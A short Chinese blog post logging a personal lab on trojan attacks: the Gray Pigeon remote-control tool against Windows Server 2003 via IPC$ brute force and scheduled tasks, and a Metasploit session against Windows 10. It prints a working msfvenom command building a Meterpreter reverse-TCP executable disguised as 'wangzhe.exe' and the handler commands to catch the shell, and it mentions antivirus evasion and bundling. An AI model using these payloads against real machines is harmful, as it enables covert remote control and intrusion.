木马攻击(灰鸽子和msf)
程序员文章站
2022-05-27 15:48:11
...
木马攻击
前言
最近在学习木马攻击方面,做了一个思维导图慢慢来学习。
不过凡是还是要从实例开始,对木马进行了大致的了解然后绘制了个脑图之后就要开始动手啦,下面记录一下我的学习过程
ps:这里可能还需要补充
灰鸽子远程控制
攻击机:Windowsxp
靶机:windows server 2003
1.配置IP
2.生成木马
查看是否生成成功:
利用ipc$暴力**
上传木马并且计划任务运行
默默等待主机上线
然后就可以任意操纵啦,实验完成之后还能帮server 2003关机~~~
msf生成木马连接我的Windows主机
攻击机:kali
靶机:win10
利用msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.129 LPORT=4444 -f exe >wangzhe.exe
会在当前路径生成一个wangzhe.exe 然后将其拖到windows下发现会被查杀
这里可以用编码器试一下能否实现免杀,定制编码器针对不同的杀软会有不同的效果;
这里先不考虑如何绕过安全狗,所以先关掉电脑管家
使用exploit模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.11.129
set LPORT 4444
exploit
执行命令
可以进入shell的环境执行命令,乱码是中文只需要调整终端的编码。
简单捆绑实现
完毕!
推荐阅读